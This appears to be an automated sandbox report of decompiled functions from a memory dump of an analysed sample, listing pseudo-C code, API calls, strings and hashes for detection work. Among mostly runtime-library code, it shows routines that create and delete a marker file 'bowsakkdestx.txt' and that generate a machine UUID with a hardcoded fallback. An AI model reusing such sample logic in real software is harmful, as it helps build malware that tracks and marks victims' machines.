_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14
.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E0040C5C0(void* __ebx, char* __ecx) {
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr* _v64;
				char _v72;
				intOrPtr _v76;
				void* __edi;
				char* _t19;
				intOrPtr _t24;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t38;
				void* _t39;
				void* _t42;
				char* _t43;

				_t31 = __ebx;
				_t19 =  &_v44;
				_v48 = 0;
				_t43 = __ecx;
				__imp__UuidCreate(_t19, _t39, _t42);
				if(_t19 != 0) {
					L9:
					_push(0x24);
					 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t43 + 0x10)) = 0;
					 *_t43 = 0;
					E004156D0(_t31, _t43, _t39, "8a4577dc-de55-4eb5-b48a-8a3eee60cd95");
					goto L10;
				} else {
					_v56 = _t19;
					__imp__UuidToStringA( &_v48,  &_v56);
					_t38 = _v64;
					if(_t38 == 0) {
						goto L9;
					} else {
						_v20 = 0xf;
						_v24 = 0;
						_v40 = 0;
						if( *_t38 != 0) {
							_t34 = _t38;
							_t39 = _t34 + 1;
							do {
								_t24 =  *_t34;
								_t34 = _t34 + 1;
							} while (_t24 != 0);
							_t35 = _t34 - _t39;
						} else {
							_t35 = 0;
						}
						E004156D0(_t31,  &_v40, _t39, _t38);
						__imp__RpcStringFreeA( &_v72, _t35);
						_v76 = 0;
						E00412CA0(_t43,  &_v52);
						if(_v36 < 0x10) {
							L10:
							return _t43;
						} else {
							L00422587(_v48);
							return _t43;
						}
					}
				}
			}

0x0040c5c0
0x0040c5cb
0x0040c5cf
0x0040c5d8
0x0040c5da
0x0040c5e2
0x0040c675
0x0040c675
0x0040c677
0x0040c680
0x0040c68c
0x0040c68f
0x00000000
0x0040c5e8
0x0040c5e8
0x0040c5f6
0x0040c5fc
0x0040c602
0x00000000
0x0040c604
0x0040c604
0x0040c60c
0x0040c614
0x0040c61c
0x0040c622
0x0040c624
0x0040c627
0x0040c627
0x0040c629
0x0040c62a
0x0040c62e
0x0040c61e
0x0040c61e
0x0040c61e
0x0040c636
0x0040c640
0x0040c64a
0x0040c655
0x0040c65f
0x0040c694
0x0040c69b
0x0040c661
0x0040c665
0x0040c674
0x0040c674
0x0040c65f
0x0040c602

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,?), ref: 0040C5F6
RpcStringFreeA.RPCRT4(?), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: 33d66bd02b00bc2acc34edfe8eeb3cae24413370cf945822c3da00e57b4ae0fc
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: 33d66bd02b00bc2acc34edfe8eeb3cae24413370cf945822c3da00e57b4ae0fc
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Uniqueness

Uniqueness Score: -1.00%

Function 00437A2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00437A2D(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(E0043884E(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E0043884E(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

0x00437a31
0x00437a36
0x00437a5e
0x00000000
0x00437a8c
0x00437a7e
0x00437aaf
0x00000000
0x00437aaf
0x00000000
0x00437a80
0x00437aad
0x00000000
0x00000000
0x00437ab3
0x00437ab8
0x00437abc
0x00437abc
0x00437a85

APIs

_wcscmp.LIBCMT ref: 00437A44
_wcscmp.LIBCMT ref: 00437A55

Strings

OCP, xrefs: 00437A4F
ACP, xrefs: 00437A3E

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040C470(void* __ebx, CHAR* __ecx, void* __edx) {
				char _v264;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t17;
				CHAR* _t18;
				void* _t20;

				_t17 = __edx;
				_t4 =  &_v264;
				_t18 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t20 = E004220B6( &_v264, "w");
					__eflags = _t20;
					if(__eflags != 0) {
						_push(_t20);
						_push(lstrlenA(_t18));
						_push(1);
						_push(_t18);
						E00422B02(__ebx, _t17, _t18, _t20, __eflags);
						_push(_t20);
						E00423A38(__ebx, _t18, _t20, __eflags);
						return 1;
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c470
0x0040c479
0x0040c489
0x0040c48b
0x0040c493
0x0040c4a9
0x0040c4c0
0x0040c4c5
0x0040c4c7
0x0040c4d1
0x0040c4d9
0x0040c4da
0x0040c4dc
0x0040c4dd
0x0040c4e2
0x0040c4e3
0x0040c4f2
0x0040c4c9
0x0040c4ca
0x0040c4d0
0x0040c4d0
0x0040c495
0x0040c49b
0x0040c49b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Uniqueness

Uniqueness Score: -1.00%

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00423B4C(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E00420C62(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E0042793D(_t10, _a4) == 0) {
						_push(1);
						_v16 = "bad allocation";
						_t22 =  &_v28;
						E00430D21(_t22,  &_v16);
						_v28 = 0x4cf748;
						E00430ECA( &_v28, 0x50793c);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x4cf748;
						E00430D91(_t22);
						if((_v32 & 0x00000001) != 0) {
							L00422587(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

0x00423b4c
0x00423b4c
0x00423b4c
0x00423b61
0x00423b64
0x00423b6c
0x00000000
0x00000000
0x00423b5f
0x00423b72
0x00423b77
0x00423b7f
0x00423b82
0x00423b8f
0x00423b97
0x00423b9c
0x00423ba1
0x00423ba3
0x00423ba9
0x00423bb2
0x00423bb5
0x00423bba
0x00423bbf
0x00000000
0x00000000
0x00000000
0x00000000
0x00423b5f
0x00423b71
0x00000000

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: 51ec8559a65f5586c6e938d96443b58366af07ea5405c2cac195ac87fa6025bc
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: 51ec8559a65f5586c6e938d96443b58366af07ea5405c2cac195ac87fa6025bc
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA10(intOrPtr __ecx) {
				struct _WNDCLASSEXW _v52;

				_v52.cbSize = 0x30;
				_v52.style = 3;
				_v52.lpfnWndProc = E0041BAE0;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 0;
				_v52.hInstance = __ecx;
				_v52.hIcon = 0;
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"LPCWSTRszWindowClass";
				_v52.hIconSm = 0;
				return RegisterClassExW( &_v52);
			}

0x0041ba1d
0x0041ba24
0x0041ba2b
0x0041ba32
0x0041ba39
0x0041ba40
0x0041ba43
0x0041ba50
0x0041ba57
0x0041ba5e
0x0041ba65
0x0041ba6c
0x0041ba7c

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32 ref: 0041BA73

Strings

LPCWSTRszWindowClass, xrefs: 0041BA65
0, xrefs: 0041BA1D

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C420() {
				char _v264;
				CHAR* _t4;

				_t4 =  &_v264;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					return DeleteFileA( &_v264);
				}
				return _t4;
			}

0x0040c429
0x0040c438
0x0040c440
0x0040c44e
0x00000000
0x0040c45b
0x0040c464

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Uniqueness

Uniqueness Score: -1.00%

Function 00427C2E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00427C2E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {

				_t15 = __eflags;
				E00427F51(__ebx, __edx, __edi, __esi, __eflags);
				_t1 =  &_a4; // 0x423b69
				E00427FAE(__ebx, __edx, __edi, __esi,  *_t1);
				E00427CEC(0xff);
				asm("int3");
				_push(1);
				_push(1);
				_push(0);
				return E00427E0E(__ebx, __edi, __esi, _t15);
			}

0x00427c2e
0x00427c31
0x00427c36
0x00427c39
0x00427c44
0x00427c49
0x00427c4a
0x00427c4c
0x00427c4e
0x00427c58

APIs

__FF_MSGBANNER.LIBCMT ref: 00427C31

Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82

__NMSG_WRITE.LIBCMT ref: 00427C39

Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE

Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6

_doexit.LIBCMT ref: 00427C50

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Strings

i;B, xrefs: 00427C36

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
String ID: i;B
API String ID: 2447380256-472376889
Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040ECB0(intOrPtr* __ecx, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				char* _t82;
				intOrPtr _t85;
				intOrPtr _t99;
				intOrPtr* _t112;
				signed int _t116;
				intOrPtr* _t122;
				void* _t123;
				char* _t129;
				char* _t132;
				intOrPtr _t134;
				intOrPtr* _t136;
				intOrPtr _t138;
				void* _t139;

				_push(0xffffffff);
				_push(0x4caa30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t138;
				_t139 = _t138 - 0x28;
				_push(_t132);
				_t136 = __ecx;
				_v8 = 0;
				_t82 = 0;
				_t112 = 0;
				_v20 = 0;
				if( &_v32 != __ecx) {
					_t82 =  *__ecx;
					 *__ecx = 0;
					_t112 =  *((intOrPtr*)(__ecx + 4));
					 *((intOrPtr*)(__ecx + 4)) = 0;
					_v20 = _t82;
					 *((intOrPtr*)(__ecx + 8)) = 0;
				}
				_v8 = 1;
				if(_t82 == 0) {
					L10:
					if(_a20 == 0) {
						L39:
						if(_a24 >= 0x10) {
							_t82 = L00422587(_a4);
							_t139 = _t139 + 4;
						}
						_a24 = 0xf;
						_a20 = 0;
						_a4 = 0;
						if(_a48 >= 0x10) {
							_t82 = L00422587(_a28);
						}
						 *[fs:0x0] = _v16;
						return _t82;
					}
					_t121 =  >=  ? _a28 :  &_a28;
					_push( >=  ? _a28 :  &_a28);
					_t84 =  >=  ? _a4 :  &_a4;
					_push( >=  ? _a4 :  &_a4);
					_t82 = E00421B3B();
					_t129 = _t82;
					_t139 = _t139 + 8;
					if(_t129 == 0) {
						goto L39;
					}
					do {
						_v36 = 0xf;
						_v40 = 0;
						_v56 = 0;
						if( *_t129 != 0) {
							_t122 = _t129;
							_t23 = _t122 + 1; // 0x1
							_t132 = _t23;
							do {
								_t85 =  *_t122;
								_t122 = _t122 + 1;
							} while (_t85 != 0);
							_t123 = _t122 - _t132;
							L18:
							_push(_t123);
							_t124 =  &_v56;
							E004156D0(_t112,  &_v56, _t132, _t129);
							_v8 = 3;
							_t134 =  *((intOrPtr*)(_t136 + 4));
							if( &_v56 >= _t134) {
								L28:
								if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
									E00415230(_t112, _t136, _t134, _t124);
								}
								_t132 =  *((intOrPtr*)(_t136 + 4));
								if(_t132 != 0) {
									 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t132 + 0x10)) = 0;
									 *_t132 = 0;
									if(_v36 >= 0x10) {
										 *_t132 = _v56;
										_v56 = 0;
									} else {
										_t95 = _v40 + 1;
										if(_v40 + 1 != 0) {
											E004205A0(_t132,  &_v56, _t95);
											_t139 = _t139 + 0xc;
										}
									}
									 *((intOrPtr*)(_t132 + 0x10)) = _v40;
									 *((intOrPtr*)(_t132 + 0x14)) = _v36;
									_v36 = 0xf;
									_v40 = 0;
									_v56 = 0;
								}
								goto L36;
							}
							_t99 =  *_t136;
							_t124 =  &_v56;
							if(_t99 > _t124) {
								goto L28;
							}
							_t126 = _t124 - _t99;
							_t116 = (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2);
							if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
								E00415230(_t116, _t136, _t134, _t126);
							}
							_t112 =  *((intOrPtr*)(_t136 + 4));
							_t132 =  *_t136 + (_t116 + _t116 * 2) * 8;
							if(_t112 != 0) {
								 *((intOrPtr*)(_t112 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t112 + 0x10)) = 0;
								 *_t112 = 0;
								if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
									 *_t112 =  *_t132;
									 *_t132 = 0;
								} else {
									_t107 =  *((intOrPtr*)(_t132 + 0x10)) + 1;
									if( *((intOrPtr*)(_t132 + 0x10)) + 1 != 0) {
										E004205A0(_t112, _t132, _t107);
										_t139 = _t139 + 0xc;
									}
								}
								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t132 + 0x10));
								 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t132 + 0x14));
								 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t132 + 0x10)) = 0;
								 *_t132 = 0;
							}
							goto L36;
						}
						_t123 = 0;
						goto L18;
						L36:
						 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 0x18;
						_v8 = 1;
						if(_v36 >= 0x10) {
							L00422587(_v56);
							_t139 = _t139 + 4;
						}
						_t89 =  >=  ? _a28 :  &_a28;
						_push( >=  ? _a28 :  &_a28);
						_push(0);
						_t82 = E00421B3B();
						_t129 = _t82;
						_t139 = _t139 + 8;
					} while (_t129 != 0);
					goto L39;
				}
				_t132 = _t82;
				if(_t82 == _t112) {
					L9:
					_t82 = L00422587(_t82);
					_t139 = _t139 + 4;
					goto L10;
				} else {
					do {
						if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
							L00422587( *_t132);
							_t139 = _t139 + 4;
						}
						 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t132 + 0x10)) = 0;
						 *_t132 = 0;
						_t132 = _t132 + 0x18;
					} while (_t132 != _t112);
					_t82 = _v20;
					goto L9;
				}
			}

0x0040ecb3
0x0040ecb5
0x0040ecc0
0x0040ecc1
0x0040ecc8
0x0040eccd
0x0040ecce
0x0040ecd0
0x0040ecd7
0x0040ecd9
0x0040ecdb
0x0040ece3
0x0040ece5
0x0040ece7
0x0040ece9
0x0040ecec
0x0040ecf3
0x0040ecf6
0x0040ecf6
0x0040ecfd
0x0040ed03
0x0040ed44
0x0040ed48
0x0040eefc
0x0040ef00
0x0040ef05
0x0040ef0a
0x0040ef0a
0x0040ef11
0x0040ef18
0x0040ef1f
0x0040ef23
0x0040ef28
0x0040ef2d
0x0040ef35
0x0040ef40
0x0040ef40
0x0040ed58
0x0040ed60
0x0040ed61
0x0040ed65
0x0040ed66
0x0040ed6b
0x0040ed6d
0x0040ed72
0x00000000
0x00000000
0x0040ed80
0x0040ed83
0x0040ed8a
0x0040ed91
0x0040ed95
0x0040ed9b
0x0040ed9d
0x0040ed9d
0x0040eda0
0x0040eda0
0x0040eda2
0x0040eda3
0x0040eda7
0x0040eda9
0x0040eda9
0x0040edab
0x0040edae
0x0040edb3
0x0040edba
0x0040edbf
0x0040ee58
0x0040ee5b
0x0040ee60
0x0040ee60
0x0040ee65
0x0040ee6a
0x0040ee6c
0x0040ee73
0x0040ee7a
0x0040ee81
0x0040ee9c
0x0040ee9e
0x0040ee83
0x0040ee86
0x0040ee87
0x0040ee8f
0x0040ee94
0x0040ee94
0x0040ee87
0x0040eea8
0x0040eeae
0x0040eeb1
0x0040eeb8
0x0040eebf
0x0040eebf
0x00000000
0x0040ee6a
0x0040edc5
0x0040edc7
0x0040edcc
0x00000000
0x00000000
0x0040edd2
0x0040ede3
0x0040ede8
0x0040eded
0x0040eded
0x0040edf7
0x0040edfa
0x0040edff
0x0040ee05
0x0040ee0c
0x0040ee13
0x0040ee1a
0x0040ee31
0x0040ee33
0x0040ee1c
0x0040ee1f
0x0040ee20
0x0040ee25
0x0040ee2a
0x0040ee2a
0x0040ee20
0x0040ee3c
0x0040ee42
0x0040ee45
0x0040ee4c
0x0040ee53
0x0040ee53
0x00000000
0x0040edff
0x0040ed97
0x00000000
0x0040eec3
0x0040eec3
0x0040eec7
0x0040eecf
0x0040eed4
0x0040eed9
0x0040eed9
0x0040eee3
0x0040eee7
0x0040eee8
0x0040eeea
0x0040eeef
0x0040eef1
0x0040eef4
0x00000000
0x0040ed80
0x0040ed05
0x0040ed09
0x0040ed3b
0x0040ed3c
0x0040ed41
0x00000000
0x0040ed0b
0x0040ed10
0x0040ed14
0x0040ed18
0x0040ed1d
0x0040ed1d
0x0040ed20
0x0040ed27
0x0040ed2e
0x0040ed31
0x0040ed34
0x0040ed38
0x00000000
0x0040ed38

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: 68252e2aabc9db2da3c32abe8a95286ef25f2bf5a015f2012d521dff1bbfc377
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
